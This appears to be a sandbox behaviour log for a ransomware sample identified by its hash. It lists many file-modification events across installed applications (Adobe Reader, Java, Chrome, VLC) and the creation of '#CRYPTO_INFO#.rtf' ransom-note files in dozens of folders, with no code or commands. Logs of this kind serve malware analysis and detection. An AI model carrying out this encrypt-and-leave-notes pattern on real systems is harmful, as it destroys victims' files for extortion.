8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\mix.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fi.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_pl_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\jfxrt.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_TW.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\af_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\Welcome.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\illustrations_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\organize_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jfxswt.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview_selected-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaTypewriterRegular.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\et.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jmc.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_nextarrow_default.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\bl.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark2x.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-disabled_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\boot_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\te.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_shared_single_filetype.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\RHP_icons_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fill-sign-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\sunjce_provider.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\sfs_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.0.2.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prcr.x3d 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.RSA 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\version.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\versions\framework-dev.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.descriptorProvider.exsd 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ms_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Mail\WinMail.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-up.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\download-btn.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\protect_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-sl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\dnsns.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\files_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\mr.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\checkmark.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaTypewriterBold.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up-pressed.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\da.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\charsets.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\ui-strings.js 